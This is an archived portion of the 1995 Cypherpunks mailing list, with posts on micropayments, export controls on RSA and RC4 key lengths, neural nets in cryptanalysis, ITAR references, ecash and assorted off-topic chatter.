> value. what has value is the FLOW of quality information.
> if Markoff continues to flow with that good information,
> people will continue to pay for it. they will perceive
> that "by paying him, the quality information flow from
> him to me continues or increases".

People as marketplace players do not think like that.

> this same idea works with software. you don't see
> software as an end product. you see it as something that
> is evolving over time. and whenever you send money to a
> company for software, in this new system the idea is that
> "I like this software, and I want to see it grow. here
> is my contribution to that".

People as marketplace players do not think like that.  

The way some of them *may* think is, "I like this product;
it will evolve; my payment for a $1 license today entitles
me to new versions for a year; so this is a Smart Move."
<click!>

Also: "I like this digest article.  I like the way this 
author thinks and expresses himself.  It's a no-brainer to 
pay 20 cents for a copy of his full newsletter."  <click!>

> another interesting area is that of patents, and I see
> this dissolving in the same way. a patent is like trying
> to put a lock on an idea. but gradually people will
> realize, only ideas that are implemented have any value.
> you can't profit and lock an idea at the same time.

"Lock" and "no value" are not how patent is generally
viewed.  Xerox, Polaroid, IBM, Dow, duPont, et al would be
amused at your view.

> *dissemination* of ideas is what leads to profit, not
> locking them up.

You first.  Dissemination of *something* leads to exposure, 
establishment of credibility, *reputation*, in a word.  
That, in turn, gets you in the door for actual sales, 
whether of yourself, your funding proposal, or your actual 
product or service.  *That*, in turn, *may* lead to 
profits, assuming you have a whole bunch of other ducks in 
a row and manage your business well.

> hence there will be an economic incentive to an inventor
> to give away his ideas for free, at first. 

Yep, yep, I'm sold, just show me where to dump all these 
great ideas so I can get rich, quick.

> in the old system, where one thinks of an idea as a
> "thing", this sounds preposterous. 

Uh, um, in a word, "Yes."

> but in a new culture where ideas are seen as things that
> need to be cultivated and grown to work, it will seem
> eminently sensible. the inventor is releasing his idea to
> the world, saying "I can expand on this idea, even turn
> it into a reality, if you send me money". 

It was late, right?  You'd been up for a long time, right?  
You were getting the aching-back, numb-fingered madrugada 
sillies, right?  You mailed this in the afternoon because 
you'd slept it off by then and forgotten what you'd written, 
right?

> other people can of course steal the idea, but
> there is no value in the idea itself: 

No, of course not!

> the value is in the development of it 

Which only the originator can do, of course.

> into evolved new states, or the intellectual expertise of
> the inventor.

Yeah, history really shows this to be an effective 
principle on which to peg the survival of inventors.

> in short, microcurrency could have quite a liberating
> and revolutionary effect on economics as we know it. 

Yep.  Liberating it clear away from planet Earth.  
Revolutionary, as in, "orbital."

> in the current system, people are not paid for tiny
> contributions to the whole. the contributions have to be
> "packaged up" into something like a magazine before
> individuals can get any profit. a new system may allow
> people to be compensated directly for things that are
> hard to quantify.

This *is* part of the point, V.  Physical manufacture and
distribution of printed magazines have inherent floor costs
and necessary economies of scale that are blown away in
electronic media on the Web.  Just plug in a way for quick 
and easy micropayment and the real revolution will be off 
and running.

>  how much was Markoff's last article worth in the NYT?
> that's impossible to figure out. but if you had a
> microcurrency, you can calculate exactly how much money
> people sent to Markoff for his last article. say, across
> the world, it totalled $843.16. such a sum is not
> inconceivable. and over time it would be enough for him
> to make a salary over the whole year on, perhaps!! I'm
> arguing that this is increasingly going to become VIABLE
> over the next few years with cyberspace and
> microcurrency.

Yes, but not with payment after the fact on the honor
system.  Sit down with *any* of the numerous vendors from
whom you presently buy living space, food, municipal
services, phone service, Internet access, car repairs,
etc., and try convincing them that you should get the
product first, and if you like it you will pay. Later. 
Right.

> the microcurrency situation can even be set up in a
> company. "whoever codes this computer problem will
> receive [x] dollars from the company". the whole economic
> system becomes a fluid, pulsing entity that filters down
> to the tiniest fraction of value and gives each
> individual a quantitative value on his contribution.
> companies talk about "incentive systems" today, but
> perhaps the entire economy will become an enormous
> incentive system in this way in the future!!

I believe this is called "The Free Market," and it has
little to do with any concept of "pay what you think it's
worth after you use it."  The Internet is exploding in
part because it is the *only* free market in the world,
though a market in tenuous and vaporous ideas and
information propagated for many reasons other than direct
pecuniary benefit.  A micropayment mechanism will allow
the net to mature into a fully functioning free market in
information and services of value on which many of the
participants will support themselves.  Many of those
products and services do not presently exist as such. 

"Companies" will be quite virtual and non-geocentric, and
will form and disband in the ether. Too, everyone's
low-cost opinion soapbox will sprout a 1-cent sign on it,
and the ones with something to say that others want to read
will make something on their expression of thoughts,
research, and other information while the ones no one cares
to pay for will wither or preach to themselves.

> in this system, ultimately, I think the whole concept
> that someone "buys a product" will dissolve into the
> idea that "one rewards intellectual productivity to bring
> more of the same". it's as fundamental and intuitive as
> the difference between atoms and bits. 

I disagree.  I believe you're right about the imminent
revolution that will take off when the micropayment
mechanism falls into place, and several of the
underpinnings you present in support of that view, but I
think you've misread what this is about and where it's
going.

The crypto relevance is that everything is in place for 
profound new growth in a new form of commerce, awaiting 
only an effective mechanism that will allow one to make a 
fraction-of-a-second decision and click on something to at 
once authorize a micropayment and navigate somewhere.  Web 
page designers will work out how to best use it and how to 
package the information it buys.  Storable 
pre-authorization tokens would be nice, so that one can 
make a decision that persists through subsequent accesses 
and only pops up for review if the price changes.  And it's 
got to be smooth enough for Grandma to use it.


 ------------ http://www.phoenix.net/~tjunker ------------
| Your freedom is on the auction block.  What do you bid? |
 ---------------------------------------------------------
Unofficial Wang VS Information Center





From stewarts at ix.netcom.com  Sat Nov 11 01:07:18 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Sat, 11 Nov 95 01:07:18 PST
Subject: Who needs time vaults anyway?
Message-ID: <199511110908.BAA16272@ix12.ix.netcom.com>


At 12:15 AM 11/11/95 -0700, bryce at colorado.edu wrote:

>I don't really understand the use for "can't be opened until
>Christmas" tricks.  If you don't want anyone to see your info until
>Christmas then just don't give them a copy until then!  If you want
>to prove that you have it but not let them see it until later then
>do timestamping of hashes, zero-knowledge proofs and so forth.

For instance, suppose you want to give someone digicash on a certain day
(like a bond from your bank...)  Or leave a will, which nobody can hassle
you about while you're alive.  Or (as an extension of both) a trust that
can't be spent until some time certain in the future, like when you want
to pay Alcor to thaw your carcass out.

For the more realistic case, bonds, you want to be able to give them
the bond so they've got it in their hot little hands, but can't cheat by
spending it.  In a normal business relationship, where all the parties 
have names of some sort, this isn't so tough; it gets harder when 
some or all of you are pseudonyms...
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281







From stewarts at ix.netcom.com  Sat Nov 11 01:07:22 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Sat, 11 Nov 95 01:07:22 PST
Subject: Lotus Notes RSA Implementation Question
Message-ID: <199511110908.BAA16275@ix12.ix.netcom.com>


At 06:13 AM 11/11/95 GMT, bglassle at kaiwan.com wrote:
>>Notes V3 (the one currently deployed) uses 512 bit RSA keys in both the USA
>>and exportable versions. Notes V4 (currently in Beta) uses 512 bit RSA
keys for
>>encryption in the exportable version and bigger keys for signatures in all
>>versions and for encryption in the USA version.
>
>I would assume since they are using a key size >40 bit, it is used for
>authentication only, not for data encrytion, that would skirt the ITAR
>regs.  If fact according to the docs, there is no data encryption when
>connecting to an international version server, regardless of the
>client version.

RSA keys get to have more bits than symmetric-key encryption, because they're
easier to crack and you typically use them for different things.
The permitted length seems to usually be 512 bits for RSA and 40 bits for
decent-quality symmetric cyphers (as opposed to easy-to-crack proprietary
cyphers, which may be longer if they're wimpy and the NSA's in a good mood.)
Your mileage may vary, of course. 

>My understanding was that the problems exposed with RC4 that you
>mentioned, were with the particular implemenation by Netscape.  

There were two different problems found.  The first was a straightforward
brute-force crack on 40-bit RC4 (RC4 lets you choose key length...)
While it did have known plaintext near the beginning of the message,
having it _anywhere_ makes it crackable, with a bit more work.
The second problem was a Netscape-specific use of low-quality random
numbers to pick the RC4 keys.  But the first crack was the real thing.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281







From andreas at artcom.de  Fri Nov 10 09:45:44 1995
From: andreas at artcom.de (Andreas Bogk)
Date: Sat, 11 Nov 1995 01:45:44 +0800
Subject: Small keysizes do make sense (was PGP Comment weakens...)
In-Reply-To: <199511091725.JAA17620@kiwi.cs.berkeley.edu>
Message-ID: <m0tDsG2-0002duC@horten>


-----BEGIN PGP SIGNED MESSAGE-----

>>>>> "Raph" == Raph Levien <raph at CS.Berkeley.EDU> writes:

    Raph> Since RSA decryption is cubic in key size, it takes about
    Raph> twenty times as long to sign or decrypt a message. Since

Actually Sedgewick shows an algorithm that runs in O(N*N*log N). 

Andreas

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Processed by Mailcrypt 3.4, an Emacs/PGP interface

iQCVAgUBMKNApkyjTSyISdw9AQHSVQP/eUBnTOX/kzZU4/T3w/60mnj0GpT88Saa
qsgLq3N2b2U2lOOmQYE5JGb9FTds/3Hj9kxKMGxmSlyt3nOjgWmAKLJf5AvDMY1Y
MzSVaswzst/EyQYeQBZcUl+ahy3HFLLR8CUMX/IIeJS0w3iJbW4FNsmsTqCf/7Tg
p1Pa+TXQKYk=
=Vrsb
-----END PGP SIGNATURE-----





From anonymous at robo.remailer  Sat Nov 11 02:00:08 1995
From: anonymous at robo.remailer (anonymous at robo.remailer)
Date: Sat, 11 Nov 95 02:00:08 PST
Subject: RadioMail and chaining remailers
Message-ID: <199511110954.BAA25548@infinity.c2.org>


Hello All,

I am planning to purchase a HP200LX with a wireless modem with the 
RadioMail system, My question is.  Does the RadioMail software allow
chaining of messages for remailers? Is there other crypto applications
for the HP200LX's  

Thanks in advance!

Liam







From tony266 at vabeach.email.net  Fri Nov 10 10:03:53 1995
From: tony266 at vabeach.email.net (tony266 at vabeach.email.net)
Date: Sat, 11 Nov 1995 02:03:53 +0800
Subject: Yvette
Message-ID: <9511101244.S12252920@vabeach.email.net>


I'm wondering if Yvette from Smithfield, Va is as fine as most people say she
is...





From don at cs.byu.edu  Sat Nov 11 02:31:17 1995
From: don at cs.byu.edu (don at cs.byu.edu)
Date: Sat, 11 Nov 95 02:31:17 PST
Subject: Noise and the Zen of making it go away
Message-ID: <199511111029.DAA00758@wero.byu.edu>


-----BEGIN PGP SIGNED MESSAGE-----

From: cpunk at remail.ecafe.org (ECafe Anonymous Remailer)
Subject: Win95 A Hacker's Net Dream
Windows 95 Is A Hacker's Dream Over The Internet

>Central, Hong Kong, Nov 9 (NB) -- Windows 95, combined
>with the Internet, could be a dream made in hacker
>heaven. From seasoned propeller heads Newsbytes has
>contacted, it looks like Windows 95 could be more of
>a security nightmare than was first thought.

[snip]

From: an407769 at anon.penet.fi (jerry the golden retriever)
Reply-To: an407769 at anon.penet.fi
Date: Sat, 11 Nov 1995 06:29:46 UTC

>Windows 95 Is A Hacker's Dream Over The Internet
>CENTRAL, HONG KONG, 1995 NOV 9 (NB) -- Windows 95, combined with the
>Internet, could be a dream made in hacker heaven. From seasoned propeller
>heads Newsbytes has contacted, it looks like Windows 95 could be more of a
>security nightmare than was first thought.

Gee, somebody not been reading the list lately?

I think it's true, the list has become the fast lane to dump junk into.

Re the idea of making cpunks subscriber only- that would solve a few
problems, and people could post anonymously if a seperate address were
rigged up ("security through obscurity") as a subscribed address that
throws away anything from cpunks and forwards everything else to cpunks.
The idea being, of course, that if you're not close enough to the action
to know what the current anon-routing address is, you should go away.

At least the bulk of the conspiracypunk stuff has gone away.

Don

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMKR6icLa+QKZS485AQHiFQMAlil+qYChoLhIkqxjlTvSiZacgHPHAGOx
BnauPARLTrO/MelBq2/p4gLkiYGBN6Z4Ut5wy0kZVpkRlDcDPewnhOEMZHZMZAsM
JbI79tkVZrTGTRUmwBQ2GlKctYbayodC
=HQsn
-----END PGP SIGNATURE-----





From David.Y at freedomnet.com  Fri Nov 10 11:00:15 1995
From: David.Y at freedomnet.com (David Y)
Date: Sat, 11 Nov 1995 03:00:15 +0800
Subject: mailing list.
Message-ID: <8160284964304@.freedomnet.com>



Please put me on your mailing list, thanks.






From wilcoxb at nagina.cs.colorado.edu  Fri Nov 10 11:46:09 1995
From: wilcoxb at nagina.cs.colorado.edu (Bryce)
Date: Sat, 11 Nov 1995 03:46:09 +0800
Subject: Yvette
In-Reply-To: <9511101244.S12252920@vabeach.email.net>
Message-ID: <199511101816.LAA02444@nagina.cs.colorado.edu>



-----BEGIN PGP SIGNED MESSAGE-----

 tony266 at vabeach.email.net allegedly wrote:
>
> I'm wondering if Yvette from Smithfield, Va is as fine as most people say she
> is...


Let's play "Find the Topicality"!  Pseudonymity and reputation
generation and propagation?  Text stego?  No..  Hm..



Wait!  I've got it!  Smithfield, Va is in the same state as certain
spook headquarters...


Bryce

signatures follow


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMKOXAPWZSllhfG25AQGFKwP9EeXISObFh+aWcOH5ES+V4c3kZx5OcTgn
q6A30uYMEYQDSGTQsZjY3sa/x+MjdOt7LAQB9LvGqYgamWwLBdQAGC08vA0sUoR/
q+rb3JxgY10TFwG4pTbfjkFaCOMYw8uMD0hxpbtU0MaqGvQuhYJ58RGTGV39va0H
RPJISFM/DQc=
=J0e4
-----END PGP SIGNATURE-----





From tony266 at vabeach.email.net  Fri Nov 10 11:55:39 1995
From: tony266 at vabeach.email.net (tony266 at vabeach.email.net)
Date: Sat, 11 Nov 1995 03:55:39 +0800
Subject: This is for YOU...
Message-ID: <9511101324.S12358809@vabeach.email.net>


Yvette...  Didn't LL Cool J make a song about you..."Dear yvette"...





From Atp3000 at aol.com  Fri Nov 10 12:07:48 1995
From: Atp3000 at aol.com (Atp3000 at aol.com)
Date: Sat, 11 Nov 1995 04:07:48 +0800
Subject: coding and nnet's
Message-ID: <951110141713_18585763@mail04.mail.aol.com>


cypherpunks!
I just resently got interested in coding and cryptography, and I was
wondering if you could suggest 3 or 4 papers that adresses the aplication of
neural networks in cryptography.
Thank's I really appreciate your time and consideration!
Atp3000





From turner at TeleCheck.com  Fri Nov 10 12:16:00 1995
From: turner at TeleCheck.com (turner at TeleCheck.com)
Date: Sat, 11 Nov 1995 04:16:00 +0800
Subject: Yvette
In-Reply-To: <9511101244.S12252920@vabeach.email.net>
Message-ID: <9511101938.AA17624@mercury.telecheck.com>


> I'm wondering if Yvette from Smithfield, Va is as fine as most people say she
> is...

The chair is against the wall and the deer eats her beef jerkey
savegely.

Greeting Camrade, I am glad to have finally been activated.  My first
order is to kill the person(s) who activated me.  Sorry tony, but
you must die.







From perry at piermont.com  Fri Nov 10 12:19:13 1995
From: perry at piermont.com (Perry E. Metzger)
Date: Sat, 11 Nov 1995 04:19:13 +0800
Subject: coding and nnet's
In-Reply-To: <951110141713_18585763@mail04.mail.aol.com>
Message-ID: <199511101936.OAA21643@jekyll.piermont.com>



Atp3000 at aol.com writes:
> cypherpunks!
> I just resently got interested in coding and cryptography, and I was
> wondering if you could suggest 3 or 4 papers that adresses the aplication of
> neural networks in cryptography.
> Thank's I really appreciate your time and consideration!

I personally know of none. I'm not sure how one would apply neural
networks to cryptography, frankly, or even what use one might imagine
making of them.

.pm





From KDAGUIO at aba.com  Fri Nov 10 12:34:58 1995
From: KDAGUIO at aba.com (Kawika Daguio)
Date: Sat, 11 Nov 1995 04:34:58 +0800
Subject: SPAM:E-CA$H Conference SF 11/16-17
Message-ID: <s0a3753c.047@aba.com>


COMMERCIAL - SPAM ALERT -

I will be speaking at a conference on Electronic Money
that might interest some of you sitting on some extra rEeal Money
who also suffer from the burning desire to find out what 
ideas and technology other folks are flogging on the talk-circuit.

The brochure is too long to type in but some excerpts follow:

      10 key questions to be answered at this 
       critical industry event:
       
       10.  What are the biggest avenues to entry into the world
            of electronic commerce?
        9.  Who will be the biggest users of electronic money?
        8.  Who should be allowed to issue E-cash?
        7.  How will debit and checking fit in with the electronic
            money future?
        6.  How do you balance privacy, security, and efficiency in 
            E-cash systems?
        5.  How can electronic commerce be used for a business
            advantage?
        4.  How will the government regulate E-cash?
        3.  How will electronic payment systems protect against
            fraud?
        2.  What infrastructure is needed to provide security
            on open networks?
        1.  What are the leading technologies that will be used for 
            E-cash?

Speakers:

Ernest Brickell
Bankers Trust Electronic Commerce

Richard K. Crone
Center for Electronic Banking, KPMG Peat Marwick

ME

John Doggett
Bank of Boston

Peter Gemmel
Sandia National Laboratories

Gail Grant
Open Market

Edward Hogan
MasterCard International

Randy Kahn
First Interstate of California

Michael Killen
Killen and Associates

Steve Kimmey
Tandem Computers

Paul Lambert
Barnett Banks

Ron Laurie
McCutchen, Doyle, Brown and Enersen

Scott Loftesness
First Data Corporation

Greg McKenzie
Canadian Imperial Bank of Commerce

B. Clifford Neuman
University of Southern California

Deborah Owen
Arent Fox Kinter Plotkin and Kahn

Daniel Schutzer
Citibank
Financial Services Technology Consortium

Bill Washburn
Mecklermedia

Magdalena Yesil
CyberCash 

Sponsor: IBC USA Conferences

Date:  November 16 - 17

Venue: Pan Pacific Hotel
       500 Post Street
       San Francisco

EMAIL: questions or registrations
       skeyles at ibcusa.com

Phone: 508.481.6400 ext 282 (Sherry)







From stewarts at ix.netcom.com  Fri Nov 10 12:35:02 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Sat, 11 Nov 1995 04:35:02 +0800
Subject: coding and nnet's
Message-ID: <199511101952.LAA24819@ix13.ix.netcom.com>


At 02:17 PM 11/10/95 -0500, Atp3000 at aol.com wrote:
>I just resently got interested in coding and cryptography, and I was
>wondering if you could suggest 3 or 4 papers that adresses the aplication of
>neural networks in cryptography.

Schneier's 2nd edition says "Neural nets aren't terribly useful for
cryptography,
primarily because of the shape of the solution space.  Neural nets work best for
problems that have a continuity of solutions, some better than others.  
This allows a neural net to learn, proposing better and better solutions as
it does.
Breaking an algorithm provides for very little in the way of learning
opportunities:
You either recover the key or you don't. (At least this is true if the
algorithm is
any good.)  Neural nets work well in structured environments when there is
something 
to learn, but not in the high-entropy, seemingly random world of cryptography."
And he doesn't give any references.

That's been my opinion of the issue as well; I looked into it a bit when I was
doing a project with the neural net folks back at Bell Labs, partly because
neural net chips typically have lots and lots of parallel bit-sized horsepower.
Unfortunately, the horsepower isn't arranged in ways that are very useful for
crypto;  adding together a large bunch of short chunks of data (maybe using
floating
point addition) and thresholding the sum isn't the right thing to do with
highly discontinuous functions.  You could take a similar chip design and
connect
the pieces together differently to make a brute-force searcher, i.e. take a gate
array and wire it to do crypto-like calculations, but the neural net stuff
doesn't do that very efficiently.
#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281







From an237621 at anon.penet.fi  Fri Nov 10 12:59:04 1995
From: an237621 at anon.penet.fi (an237621 at anon.penet.fi)
Date: Sat, 11 Nov 1995 04:59:04 +0800
Subject: Yvette
In-Reply-To: <199511101816.LAA02444@nagina.cs.colorado.edu>
Message-ID: <199511101201.MAA00215@gears.efn.org>



:
: tony266 at vabeach.email.net allegedly wrote:
:
: I'm wondering if Yvette from Smithfield, Va is as fine as most people say she
: is...
:
Yes, there is a cow on the lawn.






From eli at GS160.SP.CS.CMU.EDU  Fri Nov 10 13:30:33 1995
From: eli at GS160.SP.CS.CMU.EDU (eli at GS160.SP.CS.CMU.EDU)
Date: Sat, 11 Nov 1995 05:30:33 +0800
Subject: Lotus Notes RSA Implementation Question
In-Reply-To: <+cmu.andrew.internet.cypherpunks+kkcsTXG00UfAE0ynIq@andrew.cmu.edu>
Message-ID: <9511102101.AA27849@toad.com>


In article <+cmu.andrew.internet.cypherpunks+kkcsTXG00UfAE0ynIq at andrew.cmu.edu>
Charlie Kaufman writes:
>Notes V3 (the one currently deployed) uses 512 bit RSA keys in both
>the USA and exportable versions.

512-bit RSA is exportable?  I'm surprised.  It would be interesting
to CJR a known-secure binary for 512-bit RSA, attempting a little
differential cryptanalysis on the NSA's practices.  A fair test would
require that you have the political clout of Lotus/IBM, though.

--
   Eli Brandt
   eli+ at cs.cmu.edu







From stewarts at ix.netcom.com  Fri Nov 10 13:50:02 1995
From: stewarts at ix.netcom.com (Bill Stewart)
Date: Sat, 11 Nov 1995 05:50:02 +0800
Subject: Photuris Primality verification needed
Message-ID: <199511090913.BAA08368@ix.ix.netcom.com>


At 07:47 PM 11/8/95 -0800, you wrote:
>>Including the provision for the 512 bit prime is *HARMFUL* and
>>*DANGEROUS*.  Export control is not really an issue here, because if
>>companies in the United States cannot provide secure networking,
>>there are other companies in the world that can.
>
>You've convinced me. I remove my proposal to include a recommended 512-bit
>modulus. The smallest standard modulus will remain 1024-bits.

If speed is really a concern, you could do a 640 or 768 bit modulus
("Hey, back when we wrote that, everybody assumed 640 would be enough for
everybody!"), or alternatively, let people use 512-bit private modulus values -
they're still short, but they're not a target if everybody's got their own
(which also means that popular applications shouldn't ship with a
built-in 512-bit prime; if Windows 97 did that, it'd be about the same
as putting it in the spec, so really short primes should probably require
user-generation, which may contradict the desire to use short numbers
to save time.)

One question is how to conveniently let the standard offer negotiation for
the modulus length and value without adding a lot of handshake steps
        -> WILL MODLENGTH 512PRIV 768 1024 1024ALT 2048
        <- DO MODLENGTH 512PRIV
        -> WILL MODULUS
8758432798573409875098347509834750983745098348584395984357908347509843750984
3750983
        <- 404 HEY, THAT'S NOT A STRONG PRIME!



#--
#				Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts at ix.netcom.com
# Phone +1-510-247-0663 Pager/Voicemail 1-408-787-1281







From sjb at universe.digex.net  Fri Nov 10 14:16:21 1995
From: sjb at universe.digex.net (Scott Brickner)
Date: Sat, 11 Nov 1995 06:16:21 +0800
Subject: ecash speed
In-Reply-To: <199511090508.VAA05884@jobe.shell.portal.com>
Message-ID: <199511102145.QAA06533@universe.digex.net>


Hal writes:
>This all has to happen whenever you click on a link in your browser.
>Even with fast CPU's I think the extra step of connecting to the bank,
>having it check against all coins, and getting approval will be
>considerable for each link traversal.

A system like Stephen Brands' should significantly improve the
situation.  There's no benefit in double-spending micropayments since
you'll be identified after the fact.  For small enough payments, you
can skip the on-line validation and handle them in batch-mode later.
It becomes a matter of risk management, then.





From nobody at REPLAY.COM  Fri Nov 10 14:46:33 1995
From: nobody at REPLAY.COM (Anonymous)
Date: Sat, 11 Nov 1995 06:46:33 +0800
Subject: "Industry Group Rebuffs U.S. on Encryption"
Message-ID: <199511091637.RAA06491@utopia.hacktic.nl>


At 1:14 AM 11/9/95, Bill Stewart wrote:

 <deletia>
| The fact that Netscape is including
| secure email in their Navigator next release can be a big lever pushing the
| Feds toward giving up, and perhaps deserves some publicity once the 
| release version is out the door.

Giving up on what? On doing everything within its power to keep the world
beyond itself strong-cypto-free? Not likely.

In only a few decades, crypto's gone from being unheard of to the object
of an increasingly high-profile PR war over "domestic and international
terrorists and criminals." The govt's position, however, hasn't changed
substantially: it doesn't like crypto, and it never will. There will never
be a time when the cops who pull you over or drop by for a visit will say,
"Ma'am, if you've encrypted that, we respect the fact that you don't want
anyone to see that--so we'll just be going bow. You have a nice day, now,
y'hear." And there will never be no cops.

The gov't may well lose this fight eventually, but a few heads are gonna
get broken before either side wins. This fight is playing itself out on
the level of policy now, but it's much bigger than a policy issue. And the
"revolution" of Newt and his legions of weenies (I say nothing of Clinton
and his legions of weenies) is bullshit: he's an empty opportunist who's
riding a fractious coalition that'll make Clinton look like a libertarian
if it ever gets control of the country. And right now he's cluing in to
the fact that he can score some points on encryption issues: he's got his
eye on the snowballing WiReD coalition, which *no one* knew existed until
a few years ago.





From gnu at toad.com  Fri Nov 10 14:50:37 1995
From: gnu at toad.com (John Gilmore)
Date: Sat, 11 Nov 1995 06:50:37 +0800
Subject: Online ITAR and AECA; Bibliography of export control books
Message-ID: <9511102207.AA29317@toad.com>


> >    Where can one get a copy of ITAR ? Secondly , has anyone written any 
> > books on the subject and if so who and what?

The ITAR is a regulation, not a law.  You can find it via my crypto
export control page at http://www.cygnus.com/~gnu/export.html under
"State Department export guidance".  Or at
ftp://ftp.cygnus.com/pub/export/itar.in.full.  It's 380 kbytes
(but ignorance of it is no excuse!).

That regulation is authorized by the Arms Export Control Act (AECA), a
law (22 USC Sec. 2778).  The law is also available in the same places.
It's only 40 Kbytes.

I own and can recommend several books on export controls.

Layman's books on general export controls and technology policy issues:

90-26801:   Finding common ground : U.S. export controls in a changed
     global environment /  Washington, D.C. : National Academy Press, 1991.
     xviii, 390 p. : ill. ; 24 cm.
     LC CALL NUMBER: HF1414.5 .F56 1991

87-34877:   Technology transfer : a policy model / Philip A. Roberts.
     Washington, DC : National Defense University Press, 1988.  xiii, 86 p.
     ; 21 cm.  LC CALL NUMBER: HC110.T4 R62 1988 SERIES TITLE: A National
     security essay DEWEY DEC: 338.973/06 dc19

93-50697:   Silencing science : national security controls and scientific
     communication / Harold C. Relyea.  Norwood, NJ : Ablex Pub., c1994. 
     xvii, 248 p. ; 23 cm.  LC CALL NUMBER: Q223 .R45 1994.  
     SERIES TITLE: Information management, policy, and services.
     DEWEY DEC:  338.97306 dc20.  ISBN:  156750096X; 1567500978 (pbk.)

Lawyer's Tome on export controls, with detailed case citations and such:

91-37498: Root, William A.  United States export controls /  3rd ed.
     Englewood Cliffs, NJ : Prentice Hall Law & Business, c1991-  1 v.
     (loose-leaf) : ill. ; 26 cm.  ISBN:  0139529381
     LC CALL NUMBER: KF1987 .L54 1990.  DEWEY DEC:  353.0082/76 dc20
     [This one is loose-leaf and gets annual updates at $80/year.  I forget
      how much it cost originally.]

By the way, if you're trying to find general references on export
controls or crypto, or anything else, I recommend
`telnet://locis.loc.gov' and searching the Library of Congress card
catalog or the copyright records.  The user interface is IBM mainframe
oriented, but the information is without peer.

	John Gilmore






From frantz at netcom.com  Fri Nov 10 15:30:29 1995
From: frantz at netcom.com (Bill Frantz)
Date: Sat, 11 Nov 1995 07:30:29 +0800
Subject: coding and nnet's
Message-ID: <199511102255.OAA10734@netcom16.netcom.com>


At 14:17 11/10/95 -0500, Atp3000 at aol.com wrote:
>I just resently got interested in coding and cryptography, and I was
>wondering if you could suggest 3 or 4 papers that adresses the aplication of
>neural networks in cryptography.

Perhaps neural nets could be used in an unknown plain text, brute force
attack to automatically select possible decryptions for human examination. 
I don't know of any papers on the subject.

Bill


-----------------------------------------------------------------
Bill Frantz                   Periwinkle  --  Computer Consulting
(408)356-8506                 16345 Englewood Ave.
frantz at netcom.com             Los Gatos, CA 95032, USA







From jya at pipeline.com  Fri Nov 10 15:54:53 1995
From: jya at pipeline.com (John Young)
Date: Sat, 11 Nov 1995 07:54:53 +0800
Subject: coding and nnet's
Message-ID: <199511102323.SAA06186@pipe2.nyc.pipeline.com>


   Bruce Schneier comments:

   Neural Networks

   Neural nets aren't terribly useful for cryptanalysis,
   primarily because of the shape of the solution space.
   Neural nets work best with problems that have a continuity
   of solutions, some better than others. This allows a neural
   net to learn, proposing better and better solutions as it
   does. Breaking an algorithm provides for very little in the
   way of learning opportunities: You either recover the key
   or you don't. (At least this is true if the algorithm is
   any good.) Neural nets work well in structured environments
   where there is something to learn, but not in the
   high-entropy, seemingly random world of cryptography.

   "Applied Cryptography," second edition, 1996, p. 155.







From anonymous-remailer at shell.portal.com  Fri Nov 10 16:18:19 1995
From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com)
Date: Sat, 11 Nov 1995 08:18:19 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
Message-ID: <199511102353.PAA15671@jobe.shell.portal.com>


On Fri, 10 Nov 1995, Peter D. Junger wrote:

> In any case, I want to thank him for doing so, because it brought home
> to me the important fact that it is possible that the ITAR provisions
> relating to cryptographic software could be struck down, not because
> they violate the first amendment, or would violate it if passed by
> congress, and not because the court is trying to dodge the difficult
> first amendment issue, but simply because the provisions are not
> authorized by any legislation.

Hmmm, Peter actually has me worried.  I actually _understood_ what he was
talking about.  And that has me worried.

I guess that reviewing all that LIBOR financing documentation over ten
years ago, when I was extending a helping hand to the CIBC helped.  No one
should ever attempt to figure out what happens when you have an American
highrise owned by a private Canadian citizen, go into receivership with a
syndicated Euro-financing while attempting a head lease to AT&T. 

An experience like that leaves you scarred for life.  You actually learn 
to grok "lawyer speak".

I guess that an interesting follow up occurs, if I perhaps muddy the 
chrystal clear waters of Peter's analysis.  It relates to another thread 
on this list, the thread on time-release crypto and the economics of 
information.  

A hypothetical which might clarify by making things murky.

If I ... as a foreign citizen ... a Canadian ... were to release an
algorithm for time-release crypto to another Canadian ... another
foreigner, could I actually be hauled down by the scruff of my neck to
face US style "justice".  Could I be deprived of our Canadian traditions of 
Napoleonic Code and of British Common Law, to face Americanism's.

Does anyone from State have any clarification of this policy-shift??

I find it ridiculous to hear that if I load a series of messages into a
fax machine, and instruct that machine to send out a series of documents
at some set point in time -- and that if I were to *communicate* this
method of time delay cryptographically secure communication to another
Canadian citizen, that I could actually be hauled out of my own country
and dragged across an international border to face charges of treason 
against a state to which I have no allegiance. 

This would be laughable, if it weren't so sinister.  I mean, it's only a 
FAX machine ... for goodness sake's.

Here I am as a Canadian citizen, a citizen of a sovereign State, a state
which has historically been a friend of the American people.  A State
which has actually sacrificed its own international stature and the
security of its citizens, to benefit Americans.  (Most notably, when
Canada rescued the hostages in Iran) and America repays the citizens of
Ambassador Ken Taylor's home town how??  With an implied threat of making
them subject to US law because its administratively convenient? 

Indeed.

Can't anyone find acts of treason, a little closer to home??

Domestically maybe ... possibly even right under your nose ...

>   It's too far off topic to pursue any further, but I must take
>   exception to the suggestion that we are well served by separation of
>   powers intruding into other legal domains.  Bowsher tells us that
>   causation principles go out the window in SOP cases.  That alone
>   makes it radioactive.

You ain't whistling Dixie.

> I must admit that I don't know what it is that he is refering to.



Alice de 'nonymous ...

                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.








From s1113645 at tesla.cc.uottawa.ca  Fri Nov 10 16:44:23 1995
